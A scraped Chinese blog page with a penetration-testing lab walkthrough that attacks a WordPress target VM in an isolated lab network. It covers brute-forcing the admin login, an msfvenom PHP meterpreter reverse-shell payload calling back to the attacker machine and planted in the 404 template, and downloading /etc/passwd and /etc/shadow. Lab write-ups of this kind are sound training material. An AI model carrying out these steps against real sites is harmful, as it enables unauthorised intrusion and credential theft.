渗透测试之 暴力破解 实验

最新推荐文章于 2024-06-29 19:43:13 发布
最新推荐文章于 2024-06-29 19:43:13 发布
阅读量608 收藏 6
点赞数 22
分类专栏: 渗透测试—靶场 文章标签: 测试工具 云计算 web安全 网络安全 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62987084/article/details/139969683
版权

  • 实验环境:

  • 攻击机:Kali 192.168.253.12 靶机: Ubuntu 192.168.253.20

  • 信息探测

  • 深入挖掘

  • 尝试访问敏感目录/secret/,进去之后发现有一个log in登录按钮,我们尝试登陆看看

  • 登录之后发现当前并没有找到站点文件

  • 将前面的域名更改为靶机的ip,可以成功进入(第一种方法)

  • 在攻击机上完成 ip地址的映射 ,修改 /etc/hosts文件(第二种方法)

  • 暴力破解

  • 使用wpscan 命令对用户名进行探测,查看是否存在admin这个用户名

  • 探测完毕,发现确有admin这个用户名

  • 删去最后一条set,增加一条set — set username admin
  • show options 查看要设置的选项

  • 等待run运行结束,发现爆破出来的密码为: admin

  • 使用 用户名:admin 密码:admin,进行登录

  • 首先要制作webshell

  • msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.253.12 lport=4444 -f raw

  • 打开wordpress后台: Appearance——》Editor——》404 Template

  • 将生成的payload复制到404模板中,之后点击上传
  • 开启监听

  • 使用浏览器访问该站点的404文件

  • 查看一些系统信息
  • sysinfo: 查看系统信息,shell:打开靶场的shell

  • 发现获取到的不是root权限,接下来进行提权操作

  • 利用返回的shell下载这两个文件 /etc/passwd /etc/shadow

  • 获取flag

  • 总结

༺小白熊 ༻
关注
  • 22
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络渗透测试实验报告二
12-27
网络渗透测试实验报告二
渗透测试-暴力破解之验证码客户端验证绕过
lza20001103的博客
05-01 5268
暴力破解之验证码客户端验证绕过
渗透测试-暴力破解之hydra
lza20001103的博客
04-18 4213
渗透测试-暴力破解之hydra
渗透测试-暴力破解之验证码测试token防爆破绕过
lza20001103的博客
05-01 4470
暴力破解之验证码token防爆破绕过
渗透之密码暴力破解
qq_64302290的博客
04-27 445
一般适用于知道用户名不知道密码的时候,只能使用密码字典一个一个试出来。使用工具burp suite,搭建靶场dvwa;打开浏览器的代理功能,将流量全流向burp suite工具拦截。
渗透测试之CentOS 6.7靶机实验
浅浅的博客
04-20 3862
一、实验环境 测试机:Kali 靶机:CentOS 6.7 两台虚拟主机需在同一局域网中。 二、实验步骤 一)主动信息收集 1、主机发现 nmap 192.168.247.0/24 -sn //-sn 只做主机发现,不做端口扫描 2、端口扫描,发现只有22号端口开放 nmap -sS 192.168.247.140 -p 1-65535 --open ...
web渗透测试实战-暴力破解(low、medium、high)
c_lanxiaofang的博客
05-24 1573
一、实验项目名称 web渗透测试实战-暴力破解(low、medium、high) 二、实验目的及要求 熟悉常见web漏洞。 熟悉通过burp进行暴力破解。 三、复现步骤 1、在虚拟机win7中打开phpstudy 启动phpstudy 2、查看win7的IP(网络NAT模式)192.168.232.144 3、在火狐设置代理并安装证书 搜索“代理” 下载证书 访问127.0.0.1:8080 搜索“证书” 导入刚下载的证书 4、在火狐增加扩展...
渗透测试-metasploit-ssh弱口令暴力破解
dongxieaitonglao的博客
03-04 1148
一. ssh: SSH 为 Secure Shell 的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。 传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序
渗透学习心得-暴力破解
qq_54764105的博客
01-24 3338
//环境:1、用于测试渗透网站 2、burpsuite 先导 1、首先将环境的配置(跳过) 2、burpsuite的基本功能 3、对网站的漏洞分析以及如何利用burpsuite进行爆破 正文 1、burpsuite主要主要用于对数据进行抓包 如图将intercept开启可以将所有数据捕获并进行拦截,阻止数据向后台传递,因此页面将无法正常加载。此时若点击Drop会将当前页面请求删掉,页面无法得到回应会提示Error;若点击forward会将页面请求传输到后台得到回应正...
网络渗透测试实验报告三
12-27
网络渗透测试实验报告三
渗透测试技术之本地文件包含
02-25
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
渗透测试指南之七个阶段
11-11
渗透测试指南是根据PETS翻译整理的一份资料,供学习渗透测试的朋友更系统的学习了解渗透测试七个阶段工作。七个阶段涵盖内容分别为前期交互阶段、情报收集阶段、威胁建模阶段、漏洞分析阶段、渗透攻击阶段、后渗透...
Pytest教程:Pytest插件原理
复现的博客
06-25 133
Pytest的插件系统是其强大功能的核心,它允许用户和开发者扩展和定制测试框架的行为。要深入理解Pytest插件的原理,我们需要从Pytest的架构和设计模式开始,然后深入到底层源码。
如何从0构建一款类似pytest的工具
qiaotl的博客
06-26 868
介绍pytest工作原理,并通过代码演示如何从0构建一款类似pytest的工具
python API自动化(Pytest+Excel+Allure完整框架集成+yaml入门+大量响应报文处理及加解密、签名处理)
m0_63475519的博客
06-20 940
假设你需要测试一个登录功能,输入用户名和密码后验证登录结果。可以使用参数化实现多组输入数据的测试:测试正确的用户名和密码登录成功测试正确的用户名和错误的密码登录失败测试错误的用户名和正确的密码登录失败测试错误的用户名和密码登录失败在参数化中我们可以单参数、多参数、函数数据参数化。我们采取的思想就是进行数据分离--DDT数据驱动。
【SpringMVC】第8-14章
为技术发烧而生
06-24 568
第8章 文件上传与下载 8.1 文件上传 使用SpringMVC6版本,不需要添加以下依赖,Spring5以及之前版本需要: <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.5</version> </dependency>
【单元测试】Controller、Service、Repository 层的单元测试
书山有路,学海无涯。记录成长,追逐梦想
06-29 627
单元测试是为了检验程序的正确性。一个单元可能是单个程序、类、对象、方法 等,它是应用程序的最小可测试部件。
Python+requests+pytest+excel+allure 接口自动化测试实战
最新发布
NHB456789的博客
06-29 518
是Python标准库中自带的单元测试框架,Unittest有时候也被称为PyUnit,就像JUnit是Java语言的标准单元测试框架一样,Unittest则是Python语言的标准单元测试框架。Pytest是Python的另一个第三方单元测试库。它的目的是让单元测试变得更容易,并且也能扩展到支持应用层面复杂的功能测试。两者对比:Pytest项目实战:第一步、搭建项目框架(创建Gwyc_Api_Script_Pytest项目目录)
破解边界的基本原理.pdf
10-06
网络安全渗透测试漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值